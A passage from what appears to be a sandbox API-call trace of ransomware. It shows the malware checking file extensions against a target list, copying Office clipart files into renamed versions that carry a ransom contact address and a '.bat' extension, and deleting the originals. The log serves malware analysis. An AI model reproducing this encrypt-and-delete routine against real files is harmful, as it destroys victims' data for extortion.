Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.126] lstrlenW (lpString=".1cd") returned 4 [0060.126] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.126] lstrlenW (lpString=".jpg") returned 4 [0060.127] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.127] lstrlenW (lpString=".doc") returned 4 [0060.127] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.127] lstrlenW (lpString=".docx") returned 5 [0060.127] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.127] lstrlenW (lpString=".pdf") returned 4 [0060.127] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.127] lstrlenW (lpString=".xls") returned 4 [0060.127] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.127] lstrlenW (lpString=".xlsx") returned 5 [0060.127] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.127] lstrlenW (lpString=".ppt") returned 4 [0060.127] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.127] lstrlenW (lpString=".zip") returned 4 [0060.127] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.127] lstrlenW (lpString=".rar") returned 4 [0060.127] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.127] lstrlenW (lpString=".bz2") returned 4 [0060.127] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.127] lstrlenW (lpString=".7z") returned 3 [0060.127] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.127] lstrlenW (lpString=".dbf") returned 4 [0060.127] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.127] lstrlenW (lpString=".1cd") returned 4 [0060.127] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00011_.GIF") returned 68 [0060.127] lstrlenW (lpString=".jpg") returned 4 [0060.127] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.128] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.128] lstrlenW (lpString="AG00038_.GIF") returned 12 [0060.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0060.129] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=3251) returned 1 [0060.129] CloseHandle (hObject=0x350) returned 1 [0060.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 0x220 [0060.129] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.130] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.130] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0060.130] GetLastError () returned 0x0 [0060.130] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xcb3, lpOverlapped=0x0) returned 1 [0060.384] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xcc0, lpOverlapped=0x0) returned 1 [0060.385] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.385] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.385] SetEndOfFile (hFile=0x344) returned 1 [0060.385] CloseHandle (hObject=0x344) returned 1 [0060.386] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.386] SetEndOfFile (hFile=0x368) returned 1 [0060.387] CloseHandle (hObject=0x368) returned 1 [0060.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00038_.gif")) returned 1 [0060.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.388] lstrlenW (lpString=".doc") returned 4 [0060.388] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.388] lstrlenW (lpString=".docx") returned 5 [0060.388] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.388] lstrlenW (lpString=".pdf") returned 4 [0060.388] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.388] lstrlenW (lpString=".xls") returned 4 [0060.388] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.388] lstrlenW (lpString=".xlsx") returned 5 [0060.388] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.388] lstrlenW (lpString=".ppt") returned 4 [0060.388] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.388] lstrlenW (lpString=".zip") returned 4 [0060.388] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.388] lstrlenW (lpString=".rar") returned 4 [0060.388] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.388] lstrlenW (lpString=".bz2") returned 4 [0060.388] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.389] lstrlenW (lpString=".7z") returned 3 [0060.389] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.389] lstrlenW (lpString=".dbf") returned 4 [0060.389] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.389] lstrlenW (lpString=".1cd") returned 4 [0060.389] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.389] lstrlenW (lpString=".jpg") returned 4 [0060.389] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.389] lstrlenW (lpString=".doc") returned 4 [0060.389] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.389] lstrlenW (lpString=".docx") returned 5 [0060.389] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.389] lstrlenW (lpString=".pdf") returned 4 [0060.389] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.389] lstrlenW (lpString=".xls") returned 4 [0060.389] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.389] lstrlenW (lpString=".xlsx") returned 5 [0060.389] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.389] lstrlenW (lpString=".ppt") returned 4 [0060.389] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.389] lstrlenW (lpString=".zip") returned 4 [0060.389] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.389] lstrlenW (lpString=".rar") returned 4 [0060.389] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.389] lstrlenW (lpString=".bz2") returned 4 [0060.390] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.390] lstrlenW (lpString=".7z") returned 3 [0060.390] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.390] lstrlenW (lpString=".dbf") returned 4 [0060.390] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.390] lstrlenW (lpString=".1cd") returned 4 [0060.390] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.390] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00038_.GIF") returned 68 [0060.390] lstrlenW (lpString=".jpg") returned 4 [0060.390] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.390] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.390] lstrlenW (lpString="AG00052_.GIF") returned 12 [0060.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.394] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=7686) returned 1 [0060.394] CloseHandle (hObject=0x368) returned 1 [0060.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 0x220 [0060.394] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.395] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.395] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0060.395] GetLastError () returned 0x0 [0060.395] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1e06, lpOverlapped=0x0) returned 1 [0060.438] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1e10, lpOverlapped=0x0) returned 1 [0060.439] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.439] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.439] SetEndOfFile (hFile=0x344) returned 1 [0060.439] CloseHandle (hObject=0x344) returned 1 [0060.440] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.440] SetEndOfFile (hFile=0x368) returned 1 [0060.441] CloseHandle (hObject=0x368) returned 1 [0060.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif")) returned 1 [0060.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.441] lstrlenW (lpString=".doc") returned 4 [0060.442] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.442] lstrlenW (lpString=".docx") returned 5 [0060.442] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.442] lstrlenW (lpString=".pdf") returned 4 [0060.442] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.442] lstrlenW (lpString=".xls") returned 4 [0060.442] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.442] lstrlenW (lpString=".xlsx") returned 5 [0060.442] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.442] lstrlenW (lpString=".ppt") returned 4 [0060.442] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.442] lstrlenW (lpString=".zip") returned 4 [0060.442] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.442] lstrlenW (lpString=".rar") returned 4 [0060.442] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.442] lstrlenW (lpString=".bz2") returned 4 [0060.442] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.442] lstrlenW (lpString=".7z") returned 3 [0060.442] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.442] lstrlenW (lpString=".dbf") returned 4 [0060.442] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.442] lstrlenW (lpString=".1cd") returned 4 [0060.442] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.442] lstrlenW (lpString=".jpg") returned 4 [0060.442] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.442] lstrlenW (lpString=".doc") returned 4 [0060.443] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.443] lstrlenW (lpString=".docx") returned 5 [0060.443] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.443] lstrlenW (lpString=".pdf") returned 4 [0060.443] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.443] lstrlenW (lpString=".xls") returned 4 [0060.443] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.443] lstrlenW (lpString=".xlsx") returned 5 [0060.443] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.443] lstrlenW (lpString=".ppt") returned 4 [0060.443] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.443] lstrlenW (lpString=".zip") returned 4 [0060.443] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.443] lstrlenW (lpString=".rar") returned 4 [0060.443] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.443] lstrlenW (lpString=".bz2") returned 4 [0060.443] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.443] lstrlenW (lpString=".7z") returned 3 [0060.443] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.443] lstrlenW (lpString=".dbf") returned 4 [0060.443] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.443] lstrlenW (lpString=".1cd") returned 4 [0060.443] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0060.443] lstrlenW (lpString=".jpg") returned 4 [0060.443] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0060.443] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0060.443] lstrlenW (lpString="AG00057_.GIF") returned 12 [0060.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.444] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=11891) returned 1 [0060.444] CloseHandle (hObject=0x368) returned 1 [0060.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 0x220 [0060.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0060.445] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.445] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.445] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0060.445] GetLastError () returned 0x0 [0060.445] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2e73, lpOverlapped=0x0) returned 1 [0060.576] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2e80, lpOverlapped=0x0) returned 1 [0060.577] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.577] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0060.577] SetEndOfFile (hFile=0x344) returned 1 [0060.578] CloseHandle (hObject=0x344) returned 1 [0060.578] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.578] SetEndOfFile (hFile=0x368) returned 1 [0060.579] CloseHandle (hObject=0x368) returned 1 [0060.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0060.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0060.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.580] lstrlenW (lpString=".doc") returned 4 [0060.580] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0060.580] lstrlenW (lpString=".docx") returned 5 [0060.580] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0060.580] lstrlenW (lpString=".pdf") returned 4 [0060.580] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0060.580] lstrlenW (lpString=".xls") returned 4 [0060.580] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0060.580] lstrlenW (lpString=".xlsx") returned 5 [0060.580] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0060.580] lstrlenW (lpString=".ppt") returned 4 [0060.580] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0060.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.580] lstrlenW (lpString=".zip") returned 4 [0060.580] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0060.580] lstrlenW (lpString=".rar") returned 4 [0060.580] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0060.580] lstrlenW (lpString=".bz2") returned 4 [0060.580] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0060.580] lstrlenW (lpString=".7z") returned 3 [0060.580] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0060.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.580] lstrlenW (lpString=".dbf") returned 4 [0060.580] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0060.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.581] lstrlenW (lpString=".1cd") returned 4 [0060.581] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0060.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0060.581] lstrlenW (lpString=".jpg") returned 4 [0060.581] lstrcmpiW 